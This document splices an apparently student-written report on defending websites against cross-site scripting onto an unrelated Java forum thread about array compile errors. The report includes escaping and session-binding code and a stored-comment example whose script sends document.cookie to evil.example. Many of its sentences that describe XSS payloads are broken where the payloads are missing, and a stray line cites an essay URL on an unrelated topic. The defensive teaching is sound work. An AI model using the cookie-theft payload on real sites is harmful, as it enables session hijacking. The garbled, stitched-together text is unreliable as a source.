Let us refer to the web page under attack simply as the test site (this site is used to test XSS injections). At the core of a traditional XSS attack lies a vulnerable script on the vulnerable web site. This script reads part of the HTTP request (usually the parameters, but sometimes also the path or HTTP headers) and echoes it back into the response page, in full or in part, without first sanitizing it, i.e. without making sure it does not contain HTML tags and/or JavaScript code.
During this stage there are a number of objectives that have to be identified and analysed: firstly, to define the techniques used to defend against cross-site scripting, including how to develop XSS defences properly and what kinds of internet security software are available to defend against XSS attacks; secondly, to describe the structure of XSS attacks and how they work; and lastly, to implement and analyse a series of questions collecting the opinions and viewpoints of webmasters.
According to Cook, S., (2003), cross-site scripting (XSS) attacks are those in which attackers inject malicious code, usually client-side scripts, into web applications and forms from outside sources. Due to the number of possible injection locations and techniques, many applications are vulnerable to this attack method. Scripting attacks differ from other web application vulnerabilities in that they attack an application's users rather than its infrastructure, but they can still cause a great deal of damage. This paper describes how cross-site scripting works and what makes an application vulnerable, along with suggestions to web developers for improved XSS defences that can be applied simply and sensibly to protect their websites against successful cross-site scripting attacks.
2.1 Cross site scripting Description
As outlined by Imperva (2013), cross-site scripting (XSS, formerly CSS) is an attack which exploits a site vulnerability whereby the site displays content that includes un-sanitized user-provided data. For instance, an attacker might place a hyperlink with an embedded malicious script into an online discussion forum. The purpose of the malicious script is to attack other forum users who happen to click the hyperlink; for example, it might copy user cookies and then send those cookies to the attacker.
Web sites today are more complex than ever and often contain dynamic content to enhance the user experience. Dynamic content is produced by Web applications that can deliver content tailored to an individual user's settings and requirements.
While carrying out these customizations and tasks, more and more websites take input parameters from a user and echo them back to that user, usually in the response to the same page request. Examples of such behavior include the following:
1. Search engines that display the search term in the title ("Search Engine Results for: search_term")
2. Error messages that incorporate the erroneous parameter
3. Personalized responses ("Hello, username")
XSS (cross-site scripting) attacks occur when an attacker exploits such applications and crafts a request with malicious data (such as a script) that is later presented to the user who requests it. The malicious content is usually embedded in a hyperlink, positioned so that the user will encounter it on a web site, a message board, in an email, or in an instant message. If the user then follows the link, the malicious data is sent to the Web application, which in turn generates an output page for the user that includes the malicious content. The user, however, is typically unaware of the attack and assumes the data originates from the web server itself, leading the user to believe this is valid content from the site (Imperva, 2013).
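To make the mechanism concrete, the following is a minimal JavaScript sketch (the function names are hypothetical, not taken from any real site) of how a reflected parameter becomes executable markup when echoed raw, and how HTML entity encoding renders the same input inert:

```javascript
// Hypothetical server-side page builder that echoes a request parameter
// straight into the response HTML -- the classic reflected XSS flaw.
function buildResultsPageUnsafe(searchTerm) {
  // The parameter is interpolated without any encoding, so markup survives.
  return "<h1>Search Engine Results for: " + searchTerm + "</h1>";
}

// HTML entity encoding: the browser displays these as text, never executes them.
function escapeHtml(text) {
  return text
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

function buildResultsPageSafe(searchTerm) {
  return "<h1>Search Engine Results for: " + escapeHtml(searchTerm) + "</h1>";
}

const payload = "<script>alert(1)</script>";
console.log(buildResultsPageUnsafe(payload)); // the script tag survives intact
console.log(buildResultsPageSafe(payload));   // rendered as inert visible text
```

The crafted link in the attack simply carries such a payload in a URL parameter; the fix shown here is applied on the server before the response is sent.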
2.2 Consequences of an attack
XSS code can be crafted to lift a variety of sensitive data, including any information presented on the same page where the cross-site code was planted. The biggest risk, though, is the theft of user authentication credentials.
Many websites save session or authentication credentials in a browser cookie. Malicious code can steal this session cookie and send it to a server controlled by the attacker. With the cookie in hand, the attacker may be able to access the same web site masquerading as the victim user, bypassing any login.
Even if the compromised site does not provide access to highly sensitive information such as finances or email, an attacker may be able to access personal information that can be leveraged against a more sensitive site, for example the user's webmail account.
Malicious code can also be designed to modify the content of the page presented to the site visitor. One nasty trick is to change the destination of a link on the page (or present a new link that the visitor is directly prompted to click), decoying them into visiting a malicious website engineered by the attacker to launch an even more serious attack (Weiss, A., 2012).
Alternatively, an attacker can use an XSS attack against the site owner rather than the site visitor. The same trick of altering output enables hackers to vandalize content, for example turning a news site into one where the XSS attack defaces headlines and undermines the site's credibility (Imperva, 2013).
2.3 Defending against XSS (Cross-Site Scripting) injections
Ultimately, XSS injection is closely analogous to SQL injection. As with any code injection attack, the best defence is thorough and well-tested sanitization of every user input.
Webmasters need to identify every input path through which their web site accepts incoming data. Each path must be hardened against malicious data that could represent executable code. Frequently this means implementing multiple filters along the communication pathway, for example a web application firewall such as ModSecurity plus input sanitization in the server-side input-processing code.
Developers can also use tools such as DOM Snitch for Google Chrome or XSS Me for Firefox to test their own sites for XSS vulnerabilities.
As a secondary defence, a website can bind browser cookie credentials to the user's IP (Internet Protocol) address. While not a perfect defence, this can prevent the easy misappropriation of users' cookies: an attacker would have to engineer a way to learn the victim's IP and spoof their own actions under that address. That level of attack is likely to be far less widespread than simple cookie theft (Weiss, A., 2012).
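The secondary defence of binding a session to the client's IP can be sketched as follows (a minimal JavaScript illustration; the in-memory "sessions" store and function names are hypothetical, and a real site would persist sessions and handle proxies and changing addresses):

```javascript
// Hypothetical in-memory session store keyed by session token.
const sessions = new Map();

// Record the client IP observed at login alongside the token.
function createSession(token, clientIp) {
  sessions.set(token, { ip: clientIp, createdAt: Date.now() });
}

// Reject unknown tokens and tokens replayed from a different address,
// so a cookie stolen via XSS is useless from the attacker's machine.
function validateSession(token, clientIp) {
  const session = sessions.get(token);
  return session !== undefined && session.ip === clientIp;
}

createSession("abc123", "203.0.113.5");
console.log(validateSession("abc123", "203.0.113.5"));  // legitimate user
console.log(validateSession("abc123", "198.51.100.9")); // stolen cookie, other IP
```

As the text notes, this raises the bar rather than closing the hole: an attacker who can also spoof or share the victim's address defeats it.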
2.4 Types of cross site scripting
According to OWASP (2013), there are presently three major categories of cross-site scripting. More may well be discovered in the future, so do not assume that this kind of abuse of web site vulnerabilities is necessarily limited to these three types.
1. Reflected
By far the most frequent type of cross-site scripting exploit is the reflected exploit. It targets vulnerabilities that occur in some websites when data submitted by the client is immediately processed by the server to build results, which are then sent back to the browser on the client system. An exploit succeeds if it can send code to the server that is included in the page results sent back to the browser, and if, when those results are sent, the code is not encoded using HTML special-character encoding and is thus interpreted by the browser rather than being displayed as inert visible text. The most common way to take advantage of this is a hyperlink with a malformed URL, crafted so that a variable embedded in the URL appears on the web page containing malicious code. Something as simple as a URL used by the server-side code to generate links on the page, or a user's name included in the page text so the user can be greeted by name, can become a vulnerability used in a reflected cross-site scripting exploit.
2. Stored
Also referred to as HTML injection attacks, stored XSS exploits are those where data delivered to the server is stored (usually in a database) for use in the construction of pages that will be served to other users later. This type of exploit can affect any visitor to your web site if the site is susceptible to a stored XSS flaw. The classic example of this kind of vulnerability is a content store such as a forum or bulletin board where users may use raw HTML and XHTML to format their posts. Just as with preventing reflected exploits, the key to securing your web site against stored exploits is ensuring that all submitted data is translated to display entities before being shown, so that it will not be interpreted by the browser as code.
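The stored-XSS defence just described — save posts verbatim, encode on output — can be sketched in a few lines (a JavaScript illustration with a hypothetical in-memory comment store standing in for the forum database):

```javascript
// Hypothetical stand-in for the forum's comment database.
const storedComments = [];

function saveComment(text) {
  // Store the raw submission; encoding happens at render time.
  storedComments.push(text);
}

function renderComments() {
  // Encode on output so stored markup is displayed, never executed.
  return storedComments
    .map(c => "<li>" +
      c.replace(/&/g, "&amp;").replace(/</g, "&lt;").replace(/>/g, "&gt;") +
      "</li>")
    .join("");
}

saveComment("Nice post!");
saveComment("<script>document.location='http://evil.example/?c='+document.cookie</script>");
console.log(renderComments()); // the script payload appears as harmless text
```

Encoding at render time (rather than at save time) also protects against content that reached the database through other routes, a point the output-filtering section below develops.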
3. DOM based
A DOM-based (local) cross-site scripting exploit targets vulnerabilities in the code of a web page itself. These vulnerabilities result from unprotected use of the Document Object Model in JavaScript, such that opening another web page containing malicious JavaScript code at the same time can alter the code of the first page on the local system. In older versions of Internet Explorer (IE 6 before Microsoft Windows XP Service Pack 2), such exploits could also be used against local web pages (stored on the local computer rather than retrieved from the web), and through those same pages break out of the browser sandbox to modify the local system with the user privileges under which the browser was running. Since most Microsoft Windows users were inclined to run everything under the Administrator account, this effectively meant that local XSS exploits on versions of Windows earlier than XP Service Pack 2 could do almost anything.
In a DOM-based XSS exploit, unlike stored and reflected exploits, no malicious code is sent to the server at all. The behavior of the exploit happens entirely on the local client system, but it alters the pages supplied by the otherwise benign web site before they are interpreted by the browser, so that they behave as though they carried the malicious payload from the server to the client. This means that server-side protections that strip out or block malicious cross-site scripting will not help against this kind of exploit.
Filter input parameters for special characters.
Input filtering works by removing some or all special characters (such as ', ", <, >, $, &, ^, etc.) from data that users have supplied, as it enters the server-side application components. Although it is simple to implement client-side input filtering, this should not be relied upon, since it is often a trivial exercise for an attacker to bypass it. Even when filtering is implemented on the client side, the server-side processes should perform exactly the same input filtering.
The suggested approach to implementing input filtering is to accept only a set of characters that is known to be safe, rather than rejecting a list of named special characters. This technique is referred to as positive filtering, and by accepting only characters that are known to be acceptable, it helps reduce the chance of exploiting other, as yet unknown, vulnerabilities.
For example, an application field that is expecting a person's age can be limited to the set of digits 0 through 9. There is no reason for this age element to accept any letters or other special characters (Shiarla, M., 2003).
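The positive-filtering rule for the age field can be expressed as a whitelist pattern (a JavaScript sketch; the function name isValidAge is hypothetical):

```javascript
// Positive (whitelist) filtering: accept only input matching a known-safe
// pattern, rather than trying to strip out every known-bad character.
function isValidAge(input) {
  // An age field has no reason to accept anything but one to three digits.
  return /^[0-9]{1,3}$/.test(input);
}

console.log(isValidAge("42"));                          // accepted
console.log(isValidAge("42<script>alert(1)</script>")); // rejected
console.log(isValidAge(""));                            // rejected
```

Because the pattern names what is allowed instead of what is forbidden, payloads using characters nobody thought to blacklist are rejected by default.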
Filter output, dependent on input parameters, for special characters
Output filtering works similarly to input filtering, except that special characters are filtered out of the data by the server-side application before it is sent to the client's web browser. This method should be used when data is retrieved from databases or other storage, particularly if there is a possibility that non-filtered content has been added by system processes or other applications.
Additional care must be taken when using output filtering. If the application outputs HTML content, vigilance is needed to ensure that special-character filtering is limited to data that was previously supplied by a user and saved in a database. Filtering the special characters '<' and '>' too early in the process is likely to render the resulting HTML document useless (Shiarla, M., 2003).
2.5 Alternative XSS Vulnerabilities
Sharma, A., (2004) shows that search engines that echo the search keyword that was entered are also prone to such attacks: malicious code can be injected as part of the keyword search input and is executed when the user submits the search. The dangers may include access to undesirable or private areas of the web site. For example, a code snippet can execute code on the targeted computer when the attacker simply injects HTML in this style.
Sharma, A., (2004) also states that an attacker can send an e-mail purporting to concern banking. Suppose the e-mail contains a hyperlink with a malicious script embedded in the URL. The user may be prompted to click the link and visit the website, through which the attacker can steal the user's log-in information. The same is true of a dynamically generated page when a link containing malicious code is part of the page. If the attack gets the application to display attacker-controlled HTML, trouble can creep in: both the IMG and IFRAME tags allow a new URL to load while HTML is displayed.
The most commonly attacked avenues on the web are search boxes and online forums. An attacker injects malicious code between scripting tags that the Web page accepts and interprets, using APPLET or FORM tags depending on the web page in question. Inserted malicious code can do many kinds of harm, from stealing cookies to stealing session information. Vulnerabilities of this sort are prevalent given how many languages and technologies a webmaster must be familiar with in order to safeguard against attacks; many languages (JavaScript, CGI, ASP, HTML tags, even Perl) can be vehicles for these attacks (Sharma, A., 2004).
In the following section a brief analysis of the questionnaire is given, and a number of XSS injections are used to attack a test website. Moreover, a developed XSS defence is implemented and analysed for website security purposes. The differences between the PHP code before and after development are demonstrated with a number of specific XSS attacks used to inject the test website. An explanation of what each XSS attack does, along with an analysis of the PHP code, is presented in order to make the methodology clear for future use.
The purpose of this research is to discover, through the questionnaire, how XSS is handled from the end user's perspective. The research aims to find out:
a) whether survey-based methodologies can be used to inform the defence against cross-site scripting injections;
b) how cross-site scripting (XSS) defences can be improved to prevent XSS injections.
3.1 Establishing the focus of the study
This was relatively straightforward, as it stemmed from my interest in web development and a personal desire to explore and improve XSS defences, given how many XSS attacks have been seen over the last decade. It also allowed me to make use of my existing strengths and knowledge; the research should be useful in my career and beneficial primarily to web developers.
3.1.1 Detail of the artefacts
A report including the design and analysis of the questionnaire, as well as a comparison of XSS attacks before and after the PHP improvements. Tests of the vulnerable website with XSS injections are presented and analysed in order to show how to secure websites. Recommendations and the proposed PHP code are developed and published.
3.1.2 Contribution - supporting information
Questionnaire results were gathered from the questionnaire's database, and SPSS was used to analyse the collected information. SPSS is a software package for statistical analysis used in research and academic studies. The PHP code used before the XSS defences were developed is the product of comprehensive research and can be seen in Appendix A, Figure 1. Based on the questionnaire analysis, improvements to the existing PHP code were made to strengthen the defences against XSS injections. The website used for the tests is still online and can be used for academic purposes and personal experimentation. Testing and results from the research, as well as evaluation and conclusions, are presented.
3.2 Questionnaire Analysis and implementation
This chapter describes the design and research methodology used to examine XSS attack defences between the user and the website (server). It includes a description of the research settings based on the questionnaire, the procedures used to improve the XSS defences, and the data collection. A number of appendices are used to clearly show the difference in defences before and after XSS injection. Finally, this chapter describes the instruments used as well as the data analysis procedures.
For the online questionnaire, 10 questions were published for public view. The respondents were a group of webmasters who were invited to take part and share their knowledge; their answers are investigated and analysed in the following results.
Question 1 shows that a variety of age groups are in a position to understand the use of XSS injections. The age groups selected were: 18-25 (15 people), 26-35 (17 people) and 36-40 (2 people). Younger people showed more interest in, or experience of, XSS injections than people in the 36+ age group. This can be explained by the fact that the computer is a tool used on a daily basis, whether at home, at university, etc. The total number of people who answered the questions was 34.
Question 2 asks for each respondent's degree, in order to put their experience in context. The most selected answer was Undergraduate degree (21), with Postgraduate degree (7) second, followed by First year of degree (4) and No degree (1). These results were expected, as people with undergraduate degrees have the necessary knowledge to understand XSS injections, while postgraduates focus their studies on a selected topic and are not necessarily as familiar with XSS injections as undergraduates.
Question 3 asks what CSS stands for; CSS can stand for either Cascading Style Sheets or Cross Site Scripting. In the context of this questionnaire, the expected answer was Cross Site Scripting. 27 people said Cross Site Scripting, while only 7 said Cascading Style Sheets. This suggests that the answers are informed rather than randomly selected.
According to W3C (2013), CSS (Cascading Style Sheets) is a style sheet language used for describing the presentation semantics (the formatting and appearance) of a document written in a markup language. Its most common application is to style web pages written in HTML and XHTML, but the language can also be applied to almost any XML document, including plain XML, SVG and XUL.
Cross-site scripting (CSS or XSS), by contrast, is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users, and an XSS vulnerability can be used by attackers to bypass access controls such as the same-origin policy. Cross-site scripting performed on websites accounted for roughly 84% of all security vulnerabilities documented by Symantec as of 2007. Its effect can range from a petty nuisance to a significant security risk, depending on the sensitivity of the data handled by the vulnerable site and the nature of any security mitigation implemented by the site's owner.
Figure 13 (question 4) is a dichotomous question asking whether respondents had experienced XSS injections before. Again, the results were as expected, with 27 people saying yes and only 6 saying no. 100% of postgraduate respondents had experienced an XSS injection before, as had 95% of undergraduate respondents.
According to Figure 14, question 5 (see Appendix A, Figure 3) asks respondents to identify whether two cross-site scripting (XSS) injections differ. Webmasters with sufficient knowledge of XSS were asked to decide whether there is any difference between the two injections shown. Analysing the results of this question, most respondents (26 people) said "No, just 2 different XSS injections", while 6 people said "Yes, two different URLs" and only 2 said "I do not know". The correct answer is "No (just 2 different XSS injections)", so most respondents could indeed tell XSS injections apart. The second picture's injection prints out the cookie stored by the server. The test website is deliberately vulnerable, for academic purposes and research methodology. From this question we can conclude that most webmasters understand the structure of XSS injections, which allows us to continue to question 6.
The problem analysed in the current study is that cross-site scripting attacks can frequently be used by attackers to inject websites in every possible way. Figure 15, question 6, presents a stored cross-site scripting injection. Analysing the results from a number of people, mostly web developers, yields useful information that is used to improve the defences. The image 6a data represent ratings of the code's effectiveness against XSS injection: 2 people rated the code 1, 18 people rated it 2, 8 rated it 3, 4 rated it 4 and only 1 person rated it 5, on a scale of 1 (low) to 5 (high). From these results we can see that web developers are aware of the code in Figure 5: it strips all tags, and the responses show that developers do not trust this defence very far. This gives us the opportunity to expand the related PHP code and improve it, helping web developers to understand and defend their websites accordingly.
The results of question 7 (Figure 16) were as expected, since the command strips all tags before the input is posted.
Figure 16 presents numerous cross-site scripting injections, some of which are not syntactically correct. According to Figure 7, this question answers a variety of questions we may have when analysing web developers' data. Web developers come across such code on a daily basis and already know that even a single quote (') can be an issue. Moreover, many people call themselves developers merely because they have installed a website through a one-click installer such as Fantastico, Installatron or Softaculous. Are such people aware of cross-site scripting? Can they defend their websites with their current knowledge? These and other questions are approached and analysed for academic use.
A variety of answers were selected, with numbers 3 and 4 the most commonly chosen.
Figure 17, question 8, asks for the most important step respondents would recommend for securing a new web server. This question has 11 possible answers. According to the results below, the most selected answer was "all of the above" (31): an impressive result showing that webmasters are aware of the range of potential security issues on their web servers.
Recommendations for improving XSS defences are covered in question 9 (Table 3), where respondents could select more than one answer. The most selected answers were "contextual output encoding/escaping of string input" and "safely validating untrusted HTML input", with 29 responses each. "Disabling scripts" was selected 26 times, "cookie security" 22 times and "emerging defensive technologies" 19 times. The full results are given in Table 3.
The final question, at Figure 18, is a trick question asking the respondent "What can protect you 100% from XSS attack?". Nothing can protect you 100%, because new exploits are developed and deployed against websites every day. The results are stated below, with positive outcomes.
To conclude, questions 5 and 7 are based on the code in question 6. Moreover, if the PHP source code is not changed, there is no way to defend the website; with this in mind, certain procedures have to be put in place and analysed.
Based on question 6a, which received negative responses and whose defence end users do not trust, the existing code was expanded and modified (see Appendix A, Figure 1).
The code referenced in Figure 2 is vulnerable to cross-site scripting injections. In that code, the $fp variable is set to append content to the comments.txt file, and the $string variable reads the content of comments.txt and outputs it without any restrictions. The injection used for this document is shown in Appendix A, Figure 3, along with the output of the code.
To avoid these vulnerable injections, a number of techniques must be put in place and the code edited accordingly.
Thinking about how it can be improved is the easy part, since the information stated above gives an overview of cross-site scripting injections. The flow chart in Figure 4 represents an example of how the PHP code should be developed; a detailed walk-through of this flow chart follows.
A user browses the website and starts writing in the blog's text block. The comments written in the text block are stored in a text file, i.e. comments.txt. The script automatically scans the text for unwanted executable tags (script tags, etc.). The if statement then checks the stored text: if nothing suspicious has been found, it prints the content of comments.txt; if unwanted tags were found, it strips them out and then posts the comments.
Firstly we have to consider that PHP's built-in functions usually do not react to a number of XSS attacks. Hence functions including filter_var,strip_tags, htmlentities,mysql_real_escape_string, htmlspecialchars, tend not to protect websites 100%. That said, a new defense (PHP code) must be developed with that in mind.
Moreover, we need to understand the use of str_replace, preg_replace and html_entity_decode and what they represents.
str_replace - Replace all incidents in the search string using the replacement string
preg_replace - Perform a regular expression search and replace
html_entity_decode - Convert all HTML entities on their practicable characters.
These variables and arrays belongs to xss_clean($xss) function. It searches through the input data, in this case comments.txt file, for the values listed for str_replace, preg_replace, html_entity_decode. See Appendix B, figure 7 line 4-7.
In addition, according to Appendix B, figure 7 line 8, the referenced PHP command removes any attributes starting with "on" or "xmlns". Examples of commands starting with "on" and "xmlns" are shown in Appendix C, Figure 6.
The code on Appendix B, figure 7 line 9-11, removes javascript: and vbscript: protocols from the input data.
The code on Appendix B, figure 7 line 12-14 only work in Internet Explorer browser.
Following, remove namespaced elements i.e xmlns="namespaceURI".
$xss = preg_replace('#</*\w+:\w[^>]*+>#i', '', $xss); See Appendix B, figure 7 line 15.
To continue the following code removes really unwanted tags. $old_data is set equal to $xss, which $xss will strip tags in preg_replace parenthesis.
While $old_data is not equal to $xss let that value pass and wait for the next input data. See Appendix B, figure 7 lines 16-23.
If statement is set to open comments.txt file and add the input in a new line. See Appendix B, figure 7 lines 27-32.
The very end code $string variable gets the content of comments.txt file and then prints out the content with the fuction xss_clean set before.
nl2br � Inserts HTML line breaks before all newlines inside a string. See Appendix B, figure 7 lines 38-40
The result of this function, modified code is shown on Figure 5.
The injection which is used for this example is the same we used on Figure 3 .
Appendix B, Figure 7 represents a number of XSS injections which can be used to test the improved PHP code provided on this report.
See table 1 for more details about XSS Injections before and after PHP code improvements.
For the current study the names of the internet browsers used for testings are Internet explorer version 10.0.9200.16521, Firefox version 19.0.2 and Chrome version 25.0.1364.172 m . In this document, for better understanding the purpose of each XSS injection the browser which has been used is Internet explorer version 10.0.9200.16521.
4.1 Experiment result of XSS injection used from my questionnaire.
Cross site injection onload (see table 1 #1) the "onload" keyword inside HTML stand for a event handler. It is particularly effective inside BODY tags and it is supported in all major internet browsers. Having said that, you will find instances where this strategy will fail, for example when the BODY onload event handler is formerly overloaded more aloft about the page before your vector shows up. The current XSS injection was referenced in my questionnaire, question number 7 �Select the correct(s) XSS syntax�. The referenced code is incorrect for the reason that a �;� and double quotes are missing. The corrected one should be which is also referenced on table 1 #14.
Onmouseover (see table 1 #2) By styling a vulnerable element the inline onmouseover event may be nearly as well as onload. With all the height CSS properties the chance of an individual hovering their mouse on the vulnerable element can be greatly increased. The current XSS injection on table 1 #2 is also incorrect and its missing an apostrophe (�). The corrected XSS injection is click me!
According to table 1 #3 XSS injection, the onerror event is executed if an error occurs while loading an external file. This example uses a none existence url which is loading cookies. The corrected XSS injection is
XSS attack referenced in table 1 #4 refers to case insensitive of XSS attack vector. A is a UTF-8 encoded string character of the letter �a�. All letter can be replaced with encoded characters. A list of Unicode and UTF-8 encoding characters can be found at
XSS using code encoding, script can be encoded in base64 and can be placed it in META tag. This way, we absolve alert() completely. More details about that method can be found in. These examples as well as some other can be found on a website called (See table 1 #5).
Window.location advert redirects all users who browse to the saved document.cookie on the server. In this case all users are able to see all cookies and steal sessions (See table 1 #6).
4.2 Experiment result of XSS injection used from other sources
The XSS injection presented on table 2 #1 is an XSS Locator. Inject this string, and often in which a script is vulnerable without special XSS vector requirements the word "XSS" will appear. Make use of this URL encoding calculator at "" to encode the entire string.
According to table 2 #2 XSS injection, which is also an onerror XSS injection, can be used to execute an event if an error, in this case /xssed/ popup if foo.png doesn�t exist on the webserver.
On XSS injection referenced on the table 2 #3 there is an open quote and bracket in order to close any open quotes already exists while the new injection is placed i.e. .
This XSS injection closes first any open tags (if any) and executes an alert of /xss/ popup window (see table 2 #4).
The XSS injection referenced on table 2 #5, closes first any open tags (if any) and executes an alert of /xss/ popup window.
The XSS Injection at table 2 #6 uses location.href redirection and document.cookie which can be used to read cookies with the help of JavaScript. If a web site uses cookies as session reconnaissance plane, attackers can impersonate users� requests by stealing a complete set of victim�s cookies.
popups a window named XSS with a reference to Javascript. This is the most common XSS injection used to attack vulnerable websites (see table 2 #7).
The onload occurrence responses when an object has become loaded. Onload is often used from the element to carry out a script when a web site has loaded completely all content (including script files, images, CSS files, etc.). This is a more complex injection as it uses body tag and quotes to popup a window named XSS2 (see table 2 #8).
Can be used to close any open tags and popup a window named 1. The onerror event is triggered if an error occurs while loading an external file (e.g. a document or even an image) (see table 2 #9).
As seen on table 2 #10 injection this is the same injection but with closed tags �>. As we can see at the screenshot table 2 #16 the vulnerable website injected and hided the post comment form and buttons.
the marquee tag is a non-standard HTML element which causes text to scroll up, down, left or right automatically. On this situation XSS is a scrolling text from right to left (see table 2 #11).
XSS injection at table 2 #12 refers to Cascading Style Sheet list-style-image property which can be used to replace the list item with an XSS JavaScript alert.
The website tested can be found at and. Vulnerable and defended websites respectively. All browsers which have been used are plug-in free.
As previously discussed, XSS attacks have begun to involve people�s knowledge in 2000. A group of people started then to develop XSS defenses with low success rate since technology is expanding and growing in enormous speed.
In this report, there are several phases discussed to develop a PHP code in order to defend websites from XSS injections. As a starting point, there are multiple consequences of XSS attacks which have been found through a comprehensive research. Although, an understanding of the types of XSS attacks is crucial in order to develop defenses against XSS injections. Through the questionnaire provided, results were gathered for analysis and development of XSS defenses. The main view of methodology is to represent XSS defenses to a test website and the differences between different browsers. XSS attacks used were gathered from different sources which can be found in reference list. A number of those XSS attacks were used in questionnaire for academic use and analysis to develop XSS defenses which can be used from web masters and web developers.
The survey based methodologies played a big role in analyzing the information gathered and creates a visual representation of how people react on certain circumstances. It also shows a knowledgeable group of people with different ages and certificates which gives the possibility to analyse it further by developing XSS defenses for future uses.
At this stage there were a number of objective which have to be identified and analysed. Firstly, define a definition of techniques to defend against cross-site scripting techniques.
5.1 Discussion and critical evaluation
This report states a way of how XSS can be defended with a developed PHP language code. The facts of XSS injections which has been discuss previously are that XSS injections are most likely to originate on very popular websites with high traffic such as blogs, chat rooms, wikis, social networking. It could also enable massive DDoS attacks by creating a web browser botnet. It can also send spam, damage data or defraud existing or potential customers. Last but not least, it doesn�t rely on operating systems or web browser vulnerabilities.
There are numerous XSS defenses which can be found while searching through the internet but each of them discuss a part of XSS injection and not how it can completely defended. At this document, sources have been gathered and discussed to finalize and developed a complete XSS injection which can be edited in later stage for your website standards.
The questionnaire which has been published and used for this purpose has enabled me to collect large amounts of information in short period of time. The information collected, was analysed in the methodology section while comparing the XSS injection before and after of the developed XSS defense.
This report can be used for anyone who is in need for XSS defenses. Furthermore, the knowledge of people who are not webmasters is limited which needs to be explored before start using the code referenced in the main report. Moreover, the report it is very straight forward with step by step how this code can be implemented on the test website.
Sources which were used are accurate as well as reliable. They include variety of information regarding XSS injections and have been used accordingly to produce this report and as well as the developing of new improved PHP code to protect websites against XSS attacks. There are number of publications from IBM, Washington University in St. Louis, ICS-CERT which are considered scholar and reliable sources. The information provided is logical and they are supported by evidence.
I have been very excited to produce this report of XSS defenses since I have developed several personal websites which one of them was injected and hacked through cookie session, so I took the chance to expand my knowledge and collect information for how to defend websites properly for future use.
5.2 Self Reflection
While studying on University of Wolverhampton, I have seen myself being motivated and flexible. In my opinion, IT Security (information technology) involves a variety of sub subjects which can be explored every day. The last decade securing of data and information online is given the opportunity to people to find a way to inject any kind of online applications in order to steal data and use them for their own goods. For this reason, I was motivated to explore the security of websites and how can be defended from any vulnerability online.
I began with the description of this topic and then explore how the particular XSS injections can be defended from a simple PHP code. I identified the elements used and referenced sources which have helped me to construct this XSS protection. Also, Appendices and tables have been used in order to show the differences of XSS injection before and after of developing PHP code to defend the test website.
If I could go back and had the chance to alter a report�s component that it might be the questionnaire. The questionnaire designed for this purpose could be effective and more specific on some areas helping me gather more information for evaluating. For example, I could add more images with XSS injections asking for differences and opinions and finally on question number 8 I should add fewer answers for better analysis.
Acknowledgements
I would like to thank my supervisor, Dr. Shufan Yang who helped me to follow the need of this project, by giving me some information and questions to ask myself in order to get the best results of this project. I am grateful for her contribution and guidance. | https://www.ukessays.com/essays/computer-science/a-mac-sub-layer-and-the-physical-computer-science-essay.php | CC-MAIN-2016-50 | refinedweb | 8,532 | 51.28 |
*
not a statement
mike hengst
Ranch Hand
Joined: Oct 19, 2002
Posts: 43
posted
Oct 24, 2002 20:58:00
0
Why is this statement not a good one.
public int instantiateStudents() { for(int i = 0;i < 2;++i) { Student[i] aStudent = new Student(); } }
the errors are
A:\Projects\SRC\JAVA192\Project3\GradePoint.java:60: not a statement
Student[i] aStudent = new Student();
^
A:\Projects\SRC\JAVA192\Project3\GradePoint.java:60: ';' expected
Student[i] aStudent = new Student();
Thank you Oh Lord<br />For the white blind light<br />A city rises from the sea<br />I had a splitting headache<br />from which the future's made<br />--morrisson
Dave Landers
Ranch Hand
Joined: Jul 24, 2002
Posts: 401
posted
Oct 24, 2002 21:20:00
0
The compiler is expecting something like:
Type
identifier
=
expression
;
and of course the result type of the expression has to be compatible with the Type.
You have:
Student[ i ] aStudent = new Student();
..(Type)....(Ident)..=....(Expr)...
Student[ i ] is not a valid type.
It might be a good way to reference the i'th element of an array named Student, but that doesn't work as a Type.
Now, Student[] without the
i
could be a valid type, as in "an array of Student objects", but that would not match the result of the expression "new Student()" which is of type Student.
I imagine what you want is to assign a new Student() to each element in array of Students.
So you should declare a new array of the desired size, as in:
Student[] theStudents = new Student[ SIZE ];
and then loop thru them and assign a new Student() to each of these, as in:
theStudents[ i ] = new Student();
OK?
[ October 24, 2002: Message edited by: Dave Landers ]
mike hengst
Ranch Hand
Joined: Oct 19, 2002
Posts: 43
posted
Oct 24, 2002 21:49:00
0
That was a good explanation, bout the best I've read of that idea. Here is my code so that you can see what I am trying to do. instantiateStudent is supposed to fill the Student array I have created at the top of the GradePoint class. I think there are a few other errors as well(maybe you could, or someone hel there). Anyways thanks for any time you spend on this. It is something that is due tomorrow night. Also I don't think that I want direct code but rather an explanation of what I have to do.
public class GradePoint { private static char[] VALIDGRADES = {'F','D','C','B','A'}; private static int[] POINTS = {0,1,2,3,4}; private boolean valid; Student[] students = new Student[2]; public void assignGrades() throws Exception { for(int x = 0;x < 2;++x) { instantiateStudents(); getStudentData(); } for(int x = 0;x < 2;++x) { displayGrades(); } } public double getStudentData() throws Exception { //missing return statement? char grade; double points; int index; for(int i = 0;i < 5;++i) { System.out.println("Please enter grade for student " + students[i].getStudentNumber()); grade = (char)System.in.read(); System.in.read(); System.in.read(); valid = false; for(int y = 0;y < 5;++y) { if(grade == VALIDGRADES[y]) { valid = true; index = i; } if(valid) { students[y].setGrade(index,grade); //variable not initialized? } else { --y; System.out.println("Invalid grade entered"); } } } } public void instantiateStudents() { for(int i = 0;i < 2;++i) { Student[i] = new Student(); } } public String displayGrades() { for(int i = 0;i < 2;++i) { System.out.println(students[i].toString()); } } }
Dave Landers
Ranch Hand
Joined: Jul 24, 2002
Posts: 401
posted
Oct 24, 2002 22:08:00
0
Just a few comments, based on my "visual compiler" ...
javav
?
public void assignGrades() throws Exception { for(int x = 0;x < 2;++x) { etc...
Think about what's happening here - do you really want to call each of these methods twice? I'm not exactly sure what you need to be doing (or so I'm going to claim
) so you need to figure it out.
public double getStudentData() throws Exception { //missing return statement?
Since you declared that this method returns a double, you had better make sure that happens, with a "return someDoubleValue;" statement. If you don't want to return something, then don't say that's what yer gonna do.
students[y].setGrade(index,grade); //variable not initialized?
The compiler does not look at how you use the code, but it does see that it is possible to call this method without having initialized the students array. Might think about rearranging things because of this. Sometimes, if you know better than the compiler, you can get around this message (like initialize the darn thing to some bogus value just to quiet the compiler). But these warnings are worth paying attention to because they usually mean something's amiss in the design/organization of the code.
Student[i] = new Student();
